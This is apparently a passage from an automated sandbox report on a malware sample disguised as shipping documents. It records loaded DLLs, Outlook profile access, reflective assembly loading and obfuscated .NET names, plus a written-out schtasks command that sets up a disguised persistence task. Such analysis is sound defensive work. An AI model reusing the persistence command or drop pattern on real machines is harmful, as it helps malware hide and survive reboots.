Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: rShipmentDocuments.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: rShipmentDocuments.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs .Net Code: WdEubta7iG System.Reflection.Assembly.Load(byte[])
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs .Net Code: WdEubta7iG System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058D3243 pushad ; iretd 0_2_058D3249
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058D3F8B pushad ; retn 0582h 0_2_058D3F65
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9233 push es; ret 9_2_068F9244
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_04CE3248 pushad ; iretd 10_2_04CE3249
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C04E7 push ebp; ret 10_2_069C04E8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303EFDF push ds; retn 0005h 16_2_0303EFEA
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89241 push es; ret 16_2_06D89244
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D838AD push eax; retn 0005h 16_2_06D838B2
Source: rShipmentDocuments.exe Static PE information: section name: .text entropy: 7.843601109745972
Source: ZOlmYtPdlO.exe.0.dr Static PE information: section name: .text entropy: 7.843601109745972
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, sfMpDDrgl5tIjHCJHi.cs High entropy of concatenated method names: 'vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH', 'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B', 'fkEagww8gU', 'khqaunenWt'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, LGGmv9ymOKi5LCYbxd.cs High entropy of concatenated method names: 'npHX1AblaZ', 'baqXEkOt7J', 'RuKX7KX4eq', 'iSVX6FFjK2', 'zlbXo0AyVg', 'xk8Xxe5gYw', 'Sv5X2f9F7e', 'PCAXcTpR9F', 'M3RXAoD4rj', 'dLsXJ9p8BR'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, zXKTFwNZqwSqRHqKqL.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BxBIS2KtjI', 'OZvIPm7kRm', 'aJfIzkbxK0', 'FO2gZ65hKM', 'oFRg3K4U1G', 'yfFgInamSb', 'gR9ggG0bIJ', 'awC6mZHPi1ydDq46Q07'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs High entropy of concatenated method names: 'Gn3gmISRMx', 'q1DgWRbbnS', 'g3Zg0nnG3v', 'JmvgH6JwhY', 'RYrgQKVfGT', 'RyEg4wbiXp', 'barga0LMAT', 'ShtgFVfD6W', 'Gghg8Ndg2K', 'TuvgCnWjLB'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, rrJmBaYMgAesC46HKX.cs High entropy of concatenated method names: 'xG3QjGn87h', 'NN6QYWiYKT', 'OKIHxSvTmK', 'AqtH2WSMQw', 'LWaHcxDdlY', 'blWHATvVd3', 'GtQHJ0E0eI', 'FTOH5SR86k', 'rdiHLAdUMj', 'x6DH1Vb3Zt'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, K5wdDCoyqRME3lH5EU.cs High entropy of concatenated method names: 'jTmbXwA9h', 'Vd0sdqFFt', 'UG5q0NHX8', 'uB1YhlsGh', 'FOlpvT7i5', 'yIfhkRr26', 'Y7fIVyZ8DGQoBgOfCL', 'WYQoZojU6ruWO8Bbng', 'KsNBLPTyw', 'rSaOPD72o'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WHIuwreRDsPbwviSjC.cs High entropy of concatenated method names: 'fQg07Wj5vS', 'DJC060ZXno', 'ja20RebG4F', 'l5m09JnrAG', 'CNd0wT3LMj', 'PrE0eIt332', 'stK0MFBRSS', 'hI80DxEbfd', 'IWg0SxrwDy', 'pf00PfKDeV'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, tUWY54atKrJQlDpHvp.cs High entropy of concatenated method names: 'Dispose', 'KQk3SQMWoP', 'c89IogNuuD', 'rhwllieQpv', 'IkQ3PMBGby', 'pam3zPCspE', 'ProcessDialogKey', 'vjvIZx49D7', 'ctGI37nYx2', 'jNfIIOfYcv'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, XVYEWIFWBiLsTMqJ21.cs High entropy of concatenated method names: 'nJ7akCNgu4', 'tDnaVDpnE1', 'tuAabZBu5u', 'G7lasRfKEf', 'wZBajVwA4O', 'wgFaqeYGSB', 'gTZaYWxLmp', 'u4taGsm15h', 'PvQapKO6Np', 'L3Uahmvh7C'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, Bw42dh4UebWEaNMXNVH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VQ8O7dhF48', 'Ib4O6t3FLx', 'imVOR3G4oi', 'tYDO9I8vkI', 'yI3OwPIGJi', 'Re5OendZeS', 'QmNOMxsioE'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, s8ssFsqinUuXVMjTPg.cs High entropy of concatenated method names: 'lHW3agsf51', 'xxN3F2wPIp', 'XLl3CNyHhj', 'x6y3ytZCnf', 'Oa33XwFddK', 'vgZ3KOev9h', 'QU1cv2vHdMOPcQI0FR', 'RHw0quuw1230eOtEX9', 'G4N33Sb3gu', 'ARC3g7ykgO'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, syuYZq4btbLXi0a2KwI.cs High entropy of concatenated method names: 'MBvrkZSfdd', 'nlYrVqSUI6', 'Exorb01ktZ', 'kEZrs65423', 'BVerjuu3Vh', 'gWPrqxGr2m', 'Lq4rYPUoN5', 'Y79rGTXibx', 'CNGrp5XXbI', 'isHrh3wD38'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, qsHtpHimvnffligSo0.cs High entropy of concatenated method names: 'drqfDnTwja', 'FrqfPtuOjs', 'nq5BZadZge', 'EkJB33WMYx', 'LZ9ft19Krn', 'AtJfEJ0BDx', 'P0jfUibrEY', 'nbQf7fOIZa', 'e9xf64RC3h', 'HHvfRuFnMw'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, ajBCZlS1bBb6GaZcdb.cs High entropy of concatenated method names: 'WaF4maqxIq', 'diS40DLdTd', 'nQU4QsfplF', 'DRm4abQiOR', 'J1a4FEu4HB', 'B45QwAOg80', 'qlbQeb1rY2', 'ou7QMDbksH', 'aZMQD2RIAd', 'vPlQS7PTAP'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, nSJmboJMlQX1MjvRbF.cs High entropy of concatenated method names: 'PR5TGyjIux', 'RjeTp0rKrp', 'TnTTdw65DD', 'OvIToawqCA', 'uY9T2sKkJi', 'XQVTcFavt3', 'wJyTJxOMul', 'Wf3T59jFta', 'PwWT1jVNbN', 'HLOTtJCjBI'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, n1RHYrzOvkNoCypqxv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QNDrT23w9l', 'eUvrXhj59N', 'AAxrKi78yI', 'ng3rfXJDDt', 'lplrBHsi0h', 'du2rruGQ1c', 'ARXrO0ByiC'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, ej24U02jMkJFDYhhLB.cs High entropy of concatenated method names: 'jCpBWVVIgh', 'ei5B0owIh8', 'X24BHCxlVR', 'x7gBQjMYXC', 'EbkB4Oks9w', 'klDBaEsOYg', 'IpRBFdeDva', 'WIcB8GfT3c', 'W0LBCSI4CH', 'MAMByKUJpy'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, yMxGlJ7yHLI4VmhwgP.cs High entropy of concatenated method names: 'JJkfC9M6r0', 'To1fyO6V6X', 'ToString', 'EH0fWeJ5GH', 'iVmf0NNGpu', 'C21fH5tDeM', 'rtPfQ6lLd4', 'UECf4TNT17', 'vUEfa4ewC9', 'DZRfFb1K4L'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, EsoFSY1MObHNFvQ0yc.cs High entropy of concatenated method names: 'weNr3ELckE', 'bYwrgh3JNF', 'NT4ruV2OPY', 'E9xrW2m6KQ', 'lcsr0wfgyD', 'UGYrQtCDfg', 'E5fr4SRavu', 'VbhBMmgLqE', 'OUDBDm9bgI', 'ryGBSA4fpR'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, hdAVyr44GYdXRtyTuLG.cs High entropy of concatenated method names: 'ToString', 'ubJOgovSk8', 'i9POuw6ECr', 'l1sOmfJpMN', 't8vOWsB0vp', 'iMMO0VFYrC', 'PDuOHPRuPt', 'yjJOQlPG3O', 'Ddo0HSeILfk12ZA7FEA', 'hR65JTe0aurssDo5vXt'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, z0u6FmON9MQ6CyDB1o.cs High entropy of concatenated method names: 'uh2Bd4uvT6', 'HlrBoZ6qD3', 'jm8BxKcDwq', 'bNLB2cZIGx', 'jRJB7ZJMOe', 'NRtBc0N1l1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, v2559Cskf3ytVZ5mSG.cs High entropy of concatenated method names: 'rtYHsdjGE7', 'P2WHq0gNe1', 'B6FHGZcgn0', 'dcZHpveFUp', 'WO1HXtj9rM', 'DljHKqvF8J', 'jeZHfPVBXW', 'sTrHByZ4Jn', 'lLlHrHqZjH', 'gF2HOFObap'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WuxZfQxTK70JGtybAX.cs High entropy of concatenated method names: 'ToString', 'CKxKt5bHCD', 'RobKonCHh0', 'ccRKxakiYl', 'BMCK2ps888', 'Q7ZKcj2ooO', 'jaCKAB1c6w', 'RynKJnIe0A', 'hneK5oH9J4', 'ti4KLWKYBM'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, sfMpDDrgl5tIjHCJHi.cs High entropy of concatenated method names: 'vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH', 'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B', 'fkEagww8gU', 'khqaunenWt'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, LGGmv9ymOKi5LCYbxd.cs High entropy of concatenated method names: 'npHX1AblaZ', 'baqXEkOt7J', 'RuKX7KX4eq', 'iSVX6FFjK2', 'zlbXo0AyVg', 'xk8Xxe5gYw', 'Sv5X2f9F7e', 'PCAXcTpR9F', 'M3RXAoD4rj', 'dLsXJ9p8BR'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, zXKTFwNZqwSqRHqKqL.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BxBIS2KtjI', 'OZvIPm7kRm', 'aJfIzkbxK0', 'FO2gZ65hKM', 'oFRg3K4U1G', 'yfFgInamSb', 'gR9ggG0bIJ', 'awC6mZHPi1ydDq46Q07'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs High entropy of concatenated method names: 'Gn3gmISRMx', 'q1DgWRbbnS', 'g3Zg0nnG3v', 'JmvgH6JwhY', 'RYrgQKVfGT', 'RyEg4wbiXp', 'barga0LMAT', 'ShtgFVfD6W', 'Gghg8Ndg2K', 'TuvgCnWjLB'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, rrJmBaYMgAesC46HKX.cs High entropy of concatenated method names: 'xG3QjGn87h', 'NN6QYWiYKT', 'OKIHxSvTmK', 'AqtH2WSMQw', 'LWaHcxDdlY', 'blWHATvVd3', 'GtQHJ0E0eI', 'FTOH5SR86k', 'rdiHLAdUMj', 'x6DH1Vb3Zt'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, K5wdDCoyqRME3lH5EU.cs High entropy of concatenated method names: 'jTmbXwA9h', 'Vd0sdqFFt', 'UG5q0NHX8', 'uB1YhlsGh', 'FOlpvT7i5', 'yIfhkRr26', 'Y7fIVyZ8DGQoBgOfCL', 'WYQoZojU6ruWO8Bbng', 'KsNBLPTyw', 'rSaOPD72o'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WHIuwreRDsPbwviSjC.cs High entropy of concatenated method names: 'fQg07Wj5vS', 'DJC060ZXno', 'ja20RebG4F', 'l5m09JnrAG', 'CNd0wT3LMj', 'PrE0eIt332', 'stK0MFBRSS', 'hI80DxEbfd', 'IWg0SxrwDy', 'pf00PfKDeV'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, tUWY54atKrJQlDpHvp.cs High entropy of concatenated method names: 'Dispose', 'KQk3SQMWoP', 'c89IogNuuD', 'rhwllieQpv', 'IkQ3PMBGby', 'pam3zPCspE', 'ProcessDialogKey', 'vjvIZx49D7', 'ctGI37nYx2', 'jNfIIOfYcv'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, XVYEWIFWBiLsTMqJ21.cs High entropy of concatenated method names: 'nJ7akCNgu4', 'tDnaVDpnE1', 'tuAabZBu5u', 'G7lasRfKEf', 'wZBajVwA4O', 'wgFaqeYGSB', 'gTZaYWxLmp', 'u4taGsm15h', 'PvQapKO6Np', 'L3Uahmvh7C'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, Bw42dh4UebWEaNMXNVH.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VQ8O7dhF48', 'Ib4O6t3FLx', 'imVOR3G4oi', 'tYDO9I8vkI', 'yI3OwPIGJi', 'Re5OendZeS', 'QmNOMxsioE'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, s8ssFsqinUuXVMjTPg.cs High entropy of concatenated method names: 'lHW3agsf51', 'xxN3F2wPIp', 'XLl3CNyHhj', 'x6y3ytZCnf', 'Oa33XwFddK', 'vgZ3KOev9h', 'QU1cv2vHdMOPcQI0FR', 'RHw0quuw1230eOtEX9', 'G4N33Sb3gu', 'ARC3g7ykgO'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, syuYZq4btbLXi0a2KwI.cs High entropy of concatenated method names: 'MBvrkZSfdd', 'nlYrVqSUI6', 'Exorb01ktZ', 'kEZrs65423', 'BVerjuu3Vh', 'gWPrqxGr2m', 'Lq4rYPUoN5', 'Y79rGTXibx', 'CNGrp5XXbI', 'isHrh3wD38'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, qsHtpHimvnffligSo0.cs High entropy of concatenated method names: 'drqfDnTwja', 'FrqfPtuOjs', 'nq5BZadZge', 'EkJB33WMYx', 'LZ9ft19Krn', 'AtJfEJ0BDx', 'P0jfUibrEY', 'nbQf7fOIZa', 'e9xf64RC3h', 'HHvfRuFnMw'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, ajBCZlS1bBb6GaZcdb.cs High entropy of concatenated method names: 'WaF4maqxIq', 'diS40DLdTd', 'nQU4QsfplF', 'DRm4abQiOR', 'J1a4FEu4HB', 'B45QwAOg80', 'qlbQeb1rY2', 'ou7QMDbksH', 'aZMQD2RIAd', 'vPlQS7PTAP'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, nSJmboJMlQX1MjvRbF.cs High entropy of concatenated method names: 'PR5TGyjIux', 'RjeTp0rKrp', 'TnTTdw65DD', 'OvIToawqCA', 'uY9T2sKkJi', 'XQVTcFavt3', 'wJyTJxOMul', 'Wf3T59jFta', 'PwWT1jVNbN', 'HLOTtJCjBI'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, n1RHYrzOvkNoCypqxv.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QNDrT23w9l', 'eUvrXhj59N', 'AAxrKi78yI', 'ng3rfXJDDt', 'lplrBHsi0h', 'du2rruGQ1c', 'ARXrO0ByiC'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, ej24U02jMkJFDYhhLB.cs High entropy of concatenated method names: 'jCpBWVVIgh', 'ei5B0owIh8', 'X24BHCxlVR', 'x7gBQjMYXC', 'EbkB4Oks9w', 'klDBaEsOYg', 'IpRBFdeDva', 'WIcB8GfT3c', 'W0LBCSI4CH', 'MAMByKUJpy'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, yMxGlJ7yHLI4VmhwgP.cs High entropy of concatenated method names: 'JJkfC9M6r0', 'To1fyO6V6X', 'ToString', 'EH0fWeJ5GH', 'iVmf0NNGpu', 'C21fH5tDeM', 'rtPfQ6lLd4', 'UECf4TNT17', 'vUEfa4ewC9', 'DZRfFb1K4L'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, EsoFSY1MObHNFvQ0yc.cs High entropy of concatenated method names: 'weNr3ELckE', 'bYwrgh3JNF', 'NT4ruV2OPY', 'E9xrW2m6KQ', 'lcsr0wfgyD', 'UGYrQtCDfg', 'E5fr4SRavu', 'VbhBMmgLqE', 'OUDBDm9bgI', 'ryGBSA4fpR'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, hdAVyr44GYdXRtyTuLG.cs High entropy of concatenated method names: 'ToString', 'ubJOgovSk8', 'i9POuw6ECr', 'l1sOmfJpMN', 't8vOWsB0vp', 'iMMO0VFYrC', 'PDuOHPRuPt', 'yjJOQlPG3O', 'Ddo0HSeILfk12ZA7FEA', 'hR65JTe0aurssDo5vXt'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, z0u6FmON9MQ6CyDB1o.cs High entropy of concatenated method names: 'uh2Bd4uvT6', 'HlrBoZ6qD3', 'jm8BxKcDwq', 'bNLB2cZIGx', 'jRJB7ZJMOe', 'NRtBc0N1l1', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, v2559Cskf3ytVZ5mSG.cs High entropy of concatenated method names: 'rtYHsdjGE7', 'P2WHq0gNe1', 'B6FHGZcgn0', 'dcZHpveFUp', 'WO1HXtj9rM', 'DljHKqvF8J', 'jeZHfPVBXW', 'sTrHByZ4Jn', 'lLlHrHqZjH', 'gF2HOFObap'
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WuxZfQxTK70JGtybAX.cs High entropy of concatenated method names: 'ToString', 'CKxKt5bHCD', 'RobKonCHh0', 'ccRKxakiYl', 'BMCK2ps888', 'Q7ZKcj2ooO', 'jaCKAB1c6w', 'RynKJnIe0A', 'hneK5oH9J4', 'ti4KLWKYBM'
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe

Boot Survival

Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
